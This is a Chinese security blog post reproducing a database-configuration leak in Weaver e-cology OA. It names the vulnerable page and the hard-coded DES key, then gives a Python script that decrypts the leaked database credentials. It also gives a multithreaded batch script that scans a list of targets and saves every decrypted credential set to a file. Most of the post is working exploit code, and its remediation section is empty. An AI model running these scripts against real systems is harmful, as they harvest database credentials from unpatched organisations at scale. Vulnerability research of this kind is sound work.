泛微OA数据库配置信息泄露漏洞

发表于 | 分类于 | | 阅读次数:
字数统计: 551 字 | 阅读时长 ≈ 6 分钟

0x00 前言

泛微又双叒出问题了,2019年10月24日泛微OA被爆出数据库配置信息泄露,攻击者可通过访问指定页面获取加密的数据库配置信息,下面进行漏洞复现。

0x01 漏洞复现

发生信息泄露的页面为/mobile/DBconfigReader.jsp

访问可查看到一串乱码,返回一行乱码即表明漏洞存在。

此串乱码即为数据库配置信息经过DES加密后的结果,而默认密钥在源码中可查看为1z2x3c4v5b6n

验证脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import pyDes
import base64

def desdecode(secret_key, s):
	cipherX = pyDes.des('        ')
	cipherX.setKey(secret_key)
	y = cipherX.decrypt(s)
	return y
def info_decode(res):
	data = desdecode('1z2x3c4v5b6n', res.strip())
	data = data.strip()
	print str(data)
	return str(data)
if __name__ == '__main__':
	url = 'http://zhengbao.wang/mobile/DBconfigReader.jsp'
	res = requests.get(url).content
	info_decode(res)

批量检测脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
import requests
import json
import Queue
import threading
import pyDes

class Bruter(object):
	def __init__(self, urls,threads):

		self.vb_urls = Queue.Queue()
		self.threads = threads
		for u in urls:
			self.vb_urls.put(u[0])
		#print self.vb_urls.get()
	def vb5_rce(self):
		with threading.Lock():
			while self.vb_urls.qsize() > 0:
				target = self.vb_urls.get()
				if 'http' not in target:
					target = 'http://'+target
				headers = {
				'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
				'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
				'Accept-Language': 'zh-CN,zh;q=0.9',
				'Content-Type': 'application/x-www-form-urlencoded'
				 }
				url=target+'/mobile/DBconfigReader.jsp'
				try:

					res=requests.get(url=url,headers=headers,timeout=10)
					if res.status_code == 200:
						if ('\r\n\r\n' in res.text) and (':' in res.content) and 'java' not in res.text:
							info = info_decode(res.content)
							if 'user' in info:
								print '[+] Vuluable :'+url+'     '+res.text
								file_write('e-cology-dbinfo.txt',url+'  |   '+info+'\n')
						else:
							print '[-] NotVuluable :'+url
							
					else:
						print "[-] Not access :"+str(res.status_code)+' | '+url
				except:
					print '[!] Error :'+url
	def run(self):
		for i in  range(self.threads):
			print '[+] thread '+ str(i)
			t = threading.Thread(target=self.vb5_rce)
			t.start()
def get_url():
	with open('e-cology-jsp-info.txt','r')  as f:
		r = json.loads(f.read())
		urls = r['results']
		return urls
		
def file_write(name,results):
    with open(name,mode='a') as file:
        file.write(results)

def desdecode(secret_key, s):
	cipherX = pyDes.des('        ')
	cipherX.setKey(secret_key)
	y = cipherX.decrypt(s)
	return y
def info_decode(res):
	data = desdecode('1z2x3c4v5b6n', res.strip())
	data = data.strip()
	#print str(data)
	return str(data)


if __name__ == '__main__':
	urls = get_url()
	vb5_rce = Bruter(urls=urls,threads=20)
	vb5_rce.run()

0x02 修复建议

0x03 参考链接

https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak/blob/master/OA.py

https://github.com/jas502n/DBconfigReader

本文标题:泛微OA数据库配置信息泄露漏洞

文章作者:boogle

发布时间:2019年10月30日 - 17:07

最后更新:2019年10月30日 - 19:18

原始链接:https://zhengbao.wang/泛微OA数据库配置信息泄露漏洞/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗